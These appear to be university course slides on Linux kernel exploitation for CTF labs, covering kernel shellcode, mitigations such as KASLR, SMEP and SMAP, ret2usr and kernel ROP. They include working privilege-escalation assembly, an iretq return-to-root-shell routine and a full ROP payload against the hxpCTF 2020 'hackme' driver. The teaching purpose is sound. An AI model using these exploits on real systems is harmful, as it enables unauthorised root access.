ENPM809V
Kernel Hacking Part 1
What we will cover
- Overview
- Introduction to Kernel Shellcoding
- Kernel Software Mitigations
- Ret2User
Overview
What's so special about kernel hacking?
- It's hacking another implementation
- APIs are different in the kernel
- Heap allocators are different
- New attack spaces
- Greater introspection
How powerful is a kernel exploit
- It can be pretty powerful!
- Harder to catch successful exploits
- Have more granular control of the system
- Access to privileged features
- Greater amounts of stealth
- With great power comes great responsibility!
- Easier to break the system if something goes wrong
- Can't let the kernel SEGFAULT
- Can cause the system to crash
So why learn it?
- Knowing how userspace software is vulnerable is half of the battle
- Gives us greater understanding of how the system works
- Understand why the security measures we have are in place
What we will cover?
- Introduction to Kernel Stack Based Vulnerabilities
- Introduction to Heap-Based Vulnerabilities in the Kernel
- Privilege escalation and sandbox escapes
- The kernel is too big to go over everything
Kernel Shellcoding
Review of Userspace Shellcoding
- Userspace shellcode generally (but not always) executes syscalls
- Sometimes we can load other userspace functions and execute them.
- This will not work in kernel space!
- We don't do syscalls there.
.global _start
.intel_syntax noprefix
_start:
// fd = open("/flag", O_RDONLY);
lea rdi, [rip+flag]
mov rsi, 0
mov rax, 2
syscall
// bytes_read = read(fd, buf, 100);
mov rdi, rax
mov rsi, rsp
mov rdx, 100
mov rax, 0
syscall
// write(stdout, buf, bytes_read);
mov rdi, 1
mov rsi, rsp
mov rdx, rax
mov rax, 1
syscall
// exit(42)
mov rax, 60
mov rdi, 42
syscall
flag:
.ascii "/flag\0"
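For comparison, the same open/read sequence can be sketched in C with raw syscall(2) invocations, which makes it clear that every step is a request to the kernel. The helper name read_file_raw is hypothetical, and SYS_openat with AT_FDCWD is used in place of syscall number 2 (open) purely for portability; both are assumptions, not part of the original shellcode.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Read up to len bytes of path into buf using raw syscalls.
 * Returns the number of bytes read, or -1 on failure.
 * read_file_raw is a hypothetical helper name. */
long read_file_raw(const char *path, char *buf, unsigned long len)
{
    /* openat(AT_FDCWD, path, O_RDONLY) behaves like open(path, O_RDONLY). */
    long fd = syscall(SYS_openat, AT_FDCWD, path, O_RDONLY);
    if (fd < 0)
        return -1;

    /* read(fd, buf, len): the kernel copies file data into our buffer. */
    long n = syscall(SYS_read, fd, buf, len);

    syscall(SYS_close, fd);
    return n;
}
```

Calling read_file_raw("/flag", buf, 100) and then writing the result to file descriptor 1 mirrors the assembly above.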
Review of Userspace Shellcoding
- Remember: syscalls are an interface for userspace to talk to kernel space
- We are already in the kernel space when doing kernel shellcoding
- When the syscall instruction executes, the CPU jumps straight to the kernel's syscall entry point (entry_SYSCALL_64 on x86-64)
- That entry point assumes it is being called from userspace! Don't execute syscall from kernel space.
What to do instead?
- Act like the kernel! Use kernel APIs instead!
- Remember commit_creds(prepare_kernel_cred(0))?
- What about current_task_struct->thread_info.flags &= ~(1 << TIF_SECCOMP)?
- What do you think run_cmd("/path/to/command") does?
- Remember: all of these require access to the current task, the offsets of its members, and the address of the right kernel API
- Sounds easy, right?
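The seccomp line above is only a bit operation, which a small userspace mock can illustrate. This is a sketch under assumptions: struct mock_thread_info is a hypothetical stand-in for the kernel structure, and TIF_SECCOMP is taken to be bit 8, the value used on x86-64 kernels that keep the seccomp flag in thread_info.flags. Check the target kernel's headers before relying on it.

```c
/* Assumed value: bit 8 on x86-64 kernels that store the seccomp
 * flag in thread_info.flags. Verify against the target kernel. */
#define TIF_SECCOMP 8

/* Hypothetical stand-in for the kernel's thread_info (one field only). */
struct mock_thread_info {
    unsigned long flags;
};

/* Clear the seccomp flag and leave every other flag untouched. */
void clear_seccomp_flag(struct mock_thread_info *ti)
{
    ti->flags &= ~(1UL << TIF_SECCOMP);
}

/* Return 1 if the seccomp flag is set, 0 otherwise. */
int seccomp_flag_set(const struct mock_thread_info *ti)
{
    return (int)((ti->flags >> TIF_SECCOMP) & 1UL);
}
```

In real shellcode the same AND-with-inverted-mask is applied to the flags word inside the current task, which is why the task pointer and the member offset both have to be known.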
But how do we get them?
How can I call the Kernel API?
- No KASLR?
- As simple as reading /proc/kallsyms, which lists the address of every kernel symbol
- On some systems you need root to see real addresses in /proc/kallsyms
- KASLR?
- A little bit more complicated.
- Need to leak a kernel address and calculate the offset (similar to userspace ASLR)
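Both cases in the list above reduce to a little address arithmetic, sketched here in C. The function names (kallsyms_match, kaslr_slide, rebase) are hypothetical, the code assumes a 64-bit unsigned long, and it assumes plain KASLR where every symbol moves by the same amount.

```c
#include <stdio.h>
#include <string.h>

/* Parse one /proc/kallsyms line of the form "<hex addr> <type> <name>".
 * Returns 1 and stores the address if the name matches want, else 0. */
int kallsyms_match(const char *line, const char *want, unsigned long *addr)
{
    unsigned long a;
    char type;
    char name[256];

    if (sscanf(line, "%lx %c %255s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, want) != 0)
        return 0;
    *addr = a;
    return 1;
}

/* Slide = leaked runtime address minus the address of the same
 * symbol in the unrandomized kernel image. */
unsigned long kaslr_slide(unsigned long leaked, unsigned long unslid)
{
    return leaked - unslid;
}

/* Apply the slide to any other symbol from the unrandomized image. */
unsigned long rebase(unsigned long unslid, unsigned long slide)
{
    return unslid + slide;
}
```

With one leaked address for commit_creds, rebase() would then give the runtime address of prepare_kernel_cred. Under FG-KASLR this single-slide assumption no longer holds.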
For APIs requiring the current_task
- In a kernel module, we can just use the current macro to get the current task
- Can't do this in shellcode. Why?
- current is a C macro; underneath, it reads a per-CPU pointer through the gs segment register.
- Do that gs-relative read yourself in your shellcode instead
- What shellcode might need the current_task structure?
- SECCOMP escape!
Finding Offsets within current_task
- Don't do this manually. It is really, really challenging.
- You might see some structs end with } __randomize_layout; so their field order can differ from build to build.
- What do you do instead?
- Write a kernel module in C with the actions you want your shellcode to do.
- Build it for the kernel you want to attack (e.g., using the vm build command in pwn.college).
- Reverse-engineer it to see how these actions work in assembly.
- Re-implement that assembly in your shellcode!
When you're done...
- Don't let the code segfault!
- In userspace this is okay, but in the kernel, bad things can happen.
- Much more serious repercussions
- Make sure to clean up properly and return.
- Example: If you hijacked a function pointer, act like a function and clean up!
Tips for Debugging...
- To debug the userspace component:
- Just attach GDB to it. On pwn.college, do this within the VM (vm connect)
- You won't know what is happening in the kernel
- To debug the kernel component:
- Attach to kgdb or, on pwn.college, execute vm debug.
- What this does is attach to QEMU itself.
- Harder to debug the userspace component this way
- It is the only way to debug the kernel component itself.
- On pwn.college, you might want to step through the syscall instruction itself.
Kernel Mitigations
Review of Userspace Mitigations
- Software Mitigations
- ASLR
- PIC/PIE
- RELRO
- Canaries
- And more...
KASLR
- Kernel Address Space Layout Randomization
- Enabled at system boot time
- Randomizes the base address every time the system is booted
- This can be changed through configuration (for example, the nokaslr boot parameter turns it off)
FG-KASLR
- Fine-Grained KASLR
- Enabled at system boot time
- Randomizes the .text section in finer granularity.
- Per Function basis.
- Rebasing every symbol from one leaked address and a fixed offset isn't enough anymore
- Still imperfect
Kernel Stack Canaries
- Exactly the same as userspace stack canaries
- Enabled at compilation time, can't be turned off afterwards
Supervisor Mode Execution Protection
- Prevents the kernel from executing code that lives in userspace pages
- Enabled by bit 20 of the CR4 (Control) Register
- When enabled, an instruction fetch from a user page while in kernel mode faults
- A bit in the page table entry marks each page: 1=user and 0=supervisor/kernel
- When this is enabled, executing shellcode from userspace is significantly more difficult.
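The SMEP rule can be written down as a small predicate. This is a simplified model, not how the hardware is implemented: it looks at a single page table entry (real paging checks the user bit at every level), and the function name smep_blocks_fetch is hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* CR4 bit 20 */
#define PTE_USER (1ULL << 2)  /* U/S bit of a page table entry: 1 = user */

/* Simplified model: with SMEP on, an instruction fetch made in
 * supervisor mode (CPL < 3) from a user page is blocked. */
bool smep_blocks_fetch(uint64_t cr4, uint64_t pte, int cpl)
{
    bool supervisor = cpl < 3;
    bool user_page = (pte & PTE_USER) != 0;

    return (cr4 & CR4_SMEP) != 0 && supervisor && user_page;
}
```

The predicate is false whenever the page is a kernel page, which is why later techniques reuse code that already lives in the kernel.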
Supervisor Mode Access Protection
- Prevents the kernel from accessing userspace pages
- Enabled by bit 21 of the CR4 (Control) Register
- With it on, the kernel cannot directly read or write userspace pages either.
- This is part of the reason why we have copy_to_user and copy_from_user
- This prevents things like storing ROP chains in userspace that will be executed in the kernel
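A similar simplified predicate models SMAP. The extra input is the AC flag (bit 18 of RFLAGS): on x86-64 the stac and clac instructions set and clear it, and the user-copy helpers use them to open a short window in which user pages may be touched. The function name smap_blocks_access is hypothetical, and the model again looks at a single page table entry only.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMAP  (1ULL << 21) /* CR4 bit 21 */
#define RFLAGS_AC (1ULL << 18) /* alignment-check flag, toggled by stac/clac */
#define PTE_USER  (1ULL << 2)  /* U/S bit of a page table entry: 1 = user */

/* Simplified model: with SMAP on, a data access made in supervisor
 * mode to a user page is blocked unless RFLAGS.AC is set. */
bool smap_blocks_access(uint64_t cr4, uint64_t rflags, uint64_t pte, int cpl)
{
    bool supervisor = cpl < 3;
    bool user_page = (pte & PTE_USER) != 0;
    bool ac_set = (rflags & RFLAGS_AC) != 0;

    return (cr4 & CR4_SMAP) != 0 && supervisor && user_page && !ac_set;
}
```

A ROP chain stored in userspace is read as data by ret, so under this model it is blocked as soon as SMAP is on and AC is clear.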
Kernel Page Table Isolation
- When enabled, separates the kernel page tables from the user page tables
- The kernel's page tables map both userspace and kernel space pages
- The userspace page tables map almost no kernel pages (only the minimum needed to enter and leave the kernel).
Randomized Offsets
- Randomizes the offsets of fields in certain structures per compilation
- Prevents easily reproducible shellcode for kernel exploits
- E.g., a field such as mmap sits at a different offset in each build; thus, the shellcode must be adjusted for each target.
- Prevents exploits from being widespread.
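To see why a hardcoded offset stops working, consider two hypothetical builds of the "same" structure with the fields in a different order. The struct names, the fields, and the helper read_cred_at are all made up for illustration; real kernel structures are far larger.

```c
#include <stddef.h>

/* Two hypothetical builds of one structure, fields reordered the way
 * a layout-randomizing build might reorder them. */
struct task_build_a {
    long state;
    int pid;
    void *cred;
};

struct task_build_b {
    void *cred;
    long state;
    int pid;
};

/* Read the cred pointer using an offset supplied per build,
 * rather than one baked into the code. */
void *read_cred_at(const void *task, size_t cred_offset)
{
    return *(void *const *)((const char *)task + cred_offset);
}
```

Passing offsetof(struct task_build_a, cred) for one build and offsetof(struct task_build_b, cred) for the other returns the right pointer in both cases, whereas shellcode that hardcodes either offset reads the wrong field on the other build.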
ret2usr
What is ret2usr
- Ret2usr is essentially the ret2shellcode for kernel space!
- We have a buffer overflow in the kernel, and we do not have SMEP and SMAP enabled.
- We store kernel shellcode somewhere in the userspace part of the process
- That shellcode is going to give us one of the following:
- Privilege escalation
- Escape some sort of sandbox
- Both? Something else?
What are the caveats?
- We might have KASLR and Stack Canaries!
- We need to return to the userspace part of the process somehow
- We can't just create a shell/get the flag necessarily
- Need to jump back to userspace to do this
- Need to ensure that we cleanup properly as well! Might help with the previous step.
Let's say our goal is to get a root shell via a vulnerable kernel character device
How might we tell it is vulnerable? Compare the size check (up to 0x1000 bytes) with the stack buffer tmp (32 ints, 128 bytes).
//From hxpCTF 2020
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
//...
int tmp[32];
//...
if ( _size > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
BUG();
}
_check_object_size(hackme_buf, _size, 0LL);
if ( copy_from_user(hackme_buf, data, v5) )
return -14LL;
_memcpy(tmp, hackme_buf);
//...
}
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
//...
int tmp[32];
//...
_memcpy(hackme_buf, tmp);
if ( _size > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
BUG();
}
_check_object_size(hackme_buf, _size, 1LL);
v6 = copy_to_user(data, hackme_buf, _size) == 0;
//...
}
What if we have some mitigations?
- Stack Canaries
- The character device's read handler copies past tmp on the kernel stack, so we can leak the canary. This makes it a bit easier for us.
- KASLR
- We will need to find the address to the kernel function that we want.
- Since we only care about one version of the Linux kernel, we will build our own kernel module and get the address that way
- We will print out the reference to the function that we want
- If KASLR is disabled, we can just get the address from /proc/kallsyms
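For the stack canary bullet above, the leak is easiest to handle as an array of 8-byte words. The sketch below assumes the canary sits directly after int tmp[32], which matches the ROP payload in this deck placing the cookie at index 16, and assumes 4-byte int and 8-byte unsigned long. The helper names are hypothetical.

```c
#include <stddef.h>

/* Size of the stack buffer from the decompiled handlers: int tmp[32]. */
#define TMP_BYTES (32 * sizeof(int))

/* Index of the first 8-byte word past tmp when the leaked bytes are
 * viewed as an array of unsigned long. */
size_t canary_index(void)
{
    return TMP_BYTES / sizeof(unsigned long);
}

/* Pull the assumed canary out of a leak of n words.
 * Returns 0 if the leak is too short to contain it. */
unsigned long extract_canary(const unsigned long *leak, size_t n)
{
    size_t idx = canary_index();

    return idx < n ? leak[idx] : 0;
}
```

In an exploit, leak would be filled by a read() on the device that asks for more than 128 bytes, and the extracted value is written back at the same index in the overflow payload.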
Getting an Address We Want
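// Assume this is part of a Linux Kernel Module
#include <linux/cred.h>    // prepare_kernel_cred, commit_creds
#include <linux/printk.h>  // printk

void leak_func(void)
{
void *someFunc = NULL;
// %px prints the raw address; plain %p is hashed on recent kernels
someFunc = (void *)&prepare_kernel_cred;
printk(KERN_ALERT "prepare_kernel_cred = %px\n", someFunc);
someFunc = (void *)&commit_creds;
printk(KERN_ALERT "commit_creds = %px\n", someFunc);
}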
Kernel Privilege Escalation Example
movabs rax, <addr_to_prepare_kernel_cred>; //This will look something like 0xffffffff814c67f0
xor rdi, rdi; //Why do we want to do this
call rax;
mov rdi, rax;
movabs rax, <addr_to_commit_creds>;
call rax;
Keep in mind that this only makes the process root!
Returning to Userland
- What we have so far only makes our process root; it does not yet give us a root shell
- We need to use either sysretq or iretq to return to userland
- sysretq is a little more complicated than iretq
- iretq needs five userland values set up on the stack: RIP, CS, RFLAGS, SP, and SS
- We want to make sure that RIP points to the function in usermode that brings up a shell.
- What are the steps?
Step 1: Save Usermode State
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}
/* If you want to do this in pwntools, you need to save it somewhere that's not a variable */
Step 2: Create our Root Shell
void get_shell(void)
{
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}
What are the necessary steps?
- Have your userspace component ready! (shell, etc.)
- Save userspace state
- Connect to kernel space somehow (character device, proc device, etc).
- If necessary, leak the stack canary
- Perform your kernel exploit
- If successful, you will then have a root shell!
Step 3: Exploit!
unsigned long user_rip = (unsigned long)get_shell;
void escalate_privs(void){
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;" //Setting prepare_kernel_cred param to 0
"call rax;"
"mov rdi, rax;" //Store the return value as the first parameter for commit_creds
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;" //Now we are resetting user state.
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
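The five pushes before iretq build a fixed-layout frame on the stack. Viewed as a C struct it looks like the sketch below, with the lowest address first. The struct and function names are hypothetical. Because the stack grows downward, the assembly pushes the fields in reverse order, SS first and RIP last.

```c
#include <stddef.h>
#include <stdint.h>

/* What iretq pops in 64-bit mode, lowest address first. */
struct iretq_frame {
    uint64_t rip;    /* where userland execution resumes */
    uint64_t cs;     /* saved user code segment */
    uint64_t rflags; /* saved user flags */
    uint64_t rsp;    /* saved user stack pointer */
    uint64_t ss;     /* saved user stack segment */
};

/* Build a frame from the values captured by a save_state()-style helper. */
struct iretq_frame make_iretq_frame(uint64_t rip, uint64_t cs,
                                    uint64_t rflags, uint64_t rsp,
                                    uint64_t ss)
{
    struct iretq_frame f = { rip, cs, rflags, rsp, ss };

    return f;
}
```

Laying the same five values out consecutively in a ROP payload, in this order, gives iretq exactly the frame it expects.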
Kernel ROP
Why Kernel ROP
- Remember how we talked about SMEP?
- This is basically the kernel version of NX.
- We can't just execute shellcode that lives in userspace
- We will need to find gadgets within the kernel to achieve what we are looking for.
- We will loosely go over SMAP and KPTI
Building the ROP Chain
- This will be the same as kernel shellcode
- ROP into prepare_kernel_cred(0)
- Set the return value as the first parameter via a gadget
- ROP into commit_creds
- ROP into swapgs; ret
- Setup RIP/CS/RFLAGS/SP/SS registers
- ROP into iretq
What tools can we use to find the gadgets?
- ROPGadget!
- We can do this on the kernel module or other parts of kernel code that the module has access to
- Something different from userspace:
- We might have to do some trial and error - some gadgets may be listed but won't work because of the memory they sit in (for example, a non-executable page).
What this looks like in the end
// Source: https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
unsigned long user_rip = (unsigned long)get_shell;
unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx ; ret
unsigned long cmp_rdx_jne_pop2_ret = 0xffffffff81964cc4; // cmp rdx, 8 ; jne 0xffffffff81964cbb ; pop rbx ; pop rbp ; ret
unsigned long mov_rdi_rax_jne_pop2_ret = 0xffffffff8166fea3; // mov rdi, rax ; jne 0xffffffff8166fe7a ; pop rbx ; pop rbp ; ret
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs ; pop rbp ; ret
unsigned long iretq = 0xffffffff8100c0d9;
void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0x0; // rdi <- 0
payload[off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
payload[off++] = pop_rdx_ret;
payload[off++] = 0x8; // rdx <- 8
payload[off++] = cmp_rdx_jne_pop2_ret; // make sure JNE doesn't branch
payload[off++] = 0x0; // dummy rbx
payload[off++] = 0x0; // dummy rbp
payload[off++] = mov_rdi_rax_jne_pop2_ret; // rdi <- rax
payload[off++] = 0x0; // dummy rbx
payload[off++] = 0x0; // dummy rbp
payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
payload[off++] = swapgs_pop1_ret; // swapgs
payload[off++] = 0x0; // dummy rbp
payload[off++] = iretq; // iretq frame
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;
puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));
puts("[!] Should never be reached");
}
Stack Pivoting
- Sometimes the kernel stack is not big enough to hold our ROP chain.
- We can pivot the stack pointer to userland memory that holds the ROP chain instead
- This is a user-controlled region of memory; we overwrite the RSP register so the kernel keeps using it as its stack.
- As with any ROP chain stored in userspace, this only works when SMAP is not enabled.
mov esp, <addr>;
//some additional instructions potentially
ret;
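Because the gadget loads a 32-bit value into esp, the upper half of rsp is zeroed and the new stack lands at a low address that userland can map. The arithmetic for choosing the mapping can be sketched as below. The names plan_pivot and struct pivot_layout are hypothetical, and mapping one extra page below the target is an assumption made so that kernel functions called from the chain, whose stack use grows downward, do not fault.

```c
#include <stddef.h>
#include <stdint.h>

#define PIVOT_PAGE 0x1000UL

struct pivot_layout {
    uint64_t map_base;  /* address to request from mmap with MAP_FIXED */
    size_t map_len;     /* number of bytes to map */
    size_t chain_index; /* index, in 8-byte words, where the chain starts */
};

/* Plan a two-page mapping around the value the gadget puts in esp. */
struct pivot_layout plan_pivot(uint32_t esp_value)
{
    struct pivot_layout p;
    uint64_t target = esp_value; /* writing esp zero-extends into rsp */

    p.map_base = (target & ~(uint64_t)(PIVOT_PAGE - 1)) - PIVOT_PAGE;
    p.map_len = 2 * PIVOT_PAGE;
    p.chain_index = (size_t)((target - p.map_base) / sizeof(uint64_t));
    return p;
}
```

For a gadget that loads 0x5b000000, this yields a base of 0x5b000000 - 0x1000, a length of 0x2000, and a chain starting at word 0x1000 / 8.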
What this looks like?
void build_fake_stack(void){
fake_stack = mmap((void *)0x5b000000 - 0x1000, 0x2000,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
unsigned off = 0x1000 / 8;
fake_stack[0] = 0xdead; // put something in the first page to prevent fault
fake_stack[off++] = 0x0; // dummy r12
fake_stack[off++] = 0x0; // dummy rbp
fake_stack[off++] = pop_rdi_ret;
... // the rest of the chain is the same as the last payload
}
// Source - https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
References
- https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/#the-simplest-exploit---ret2usr
- https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
Kernel Hacking Part 1
By Ragnar Security